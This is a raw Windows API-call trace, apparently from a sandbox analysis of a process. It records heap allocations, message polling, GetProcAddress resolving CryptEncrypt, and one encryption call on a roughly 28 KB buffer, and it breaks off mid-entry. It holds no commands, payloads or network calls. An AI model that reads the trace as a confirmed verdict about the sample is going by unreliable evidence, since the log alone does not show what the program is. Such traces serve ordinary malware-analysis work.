0x2e50968 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x2f288d8 [0147.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x2f2f670 [0147.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0147.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0147.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0147.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0147.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a28 [0147.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0147.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.826] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0147.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54210 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0147.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0147.827] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f21b40*, pdwDataLen=0x8cef60*=0x6d89, dwBufLen=0x6d90 | out: pbData=0x2f21b40*, pdwDataLen=0x8cef60*=0x6d90) returned 1 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0147.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0147.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0147.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0147.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0147.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0147.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0147.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0147.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0147.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0147.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0147.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f288d8 [0147.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0147.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0147.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f2f670 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f288d8 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0147.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.856] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: 